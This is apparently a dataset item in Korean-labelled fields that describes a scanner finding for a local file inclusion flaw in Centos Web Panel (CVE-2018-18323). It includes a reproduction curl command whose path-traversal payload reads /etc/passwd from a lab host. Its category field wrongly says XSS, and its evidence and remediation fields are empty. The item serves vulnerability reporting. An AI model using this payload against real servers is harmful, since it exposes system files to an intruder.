입력:
제목: Centos Web Panel 0.9.8.480 - Local File Inclusion
심각도: HIGH
카테고리: XSS
엔드포인트: http://192.168.64.2:9991/www/FileInclusion/pages/lvl2.php/admin/index.php
CVE: cve-2018-18323
설명: Centos Web Panel version 0.9.8.480 suffers from local file inclusion vulnerabilities. Other vulnerabilities including cross-site scripting and remote code execution are also known to impact this version.
영향: Successful exploitation of this vulnerability allows an attacker to read sensitive files on the server.
증거: 
재현: curl -X 'GET' -d '' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.1 Safari/605.1.15' 'http://192.168.64.2:9991/www/FileInclusion/pages/lvl2.php/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd'
대응/조치 힌트: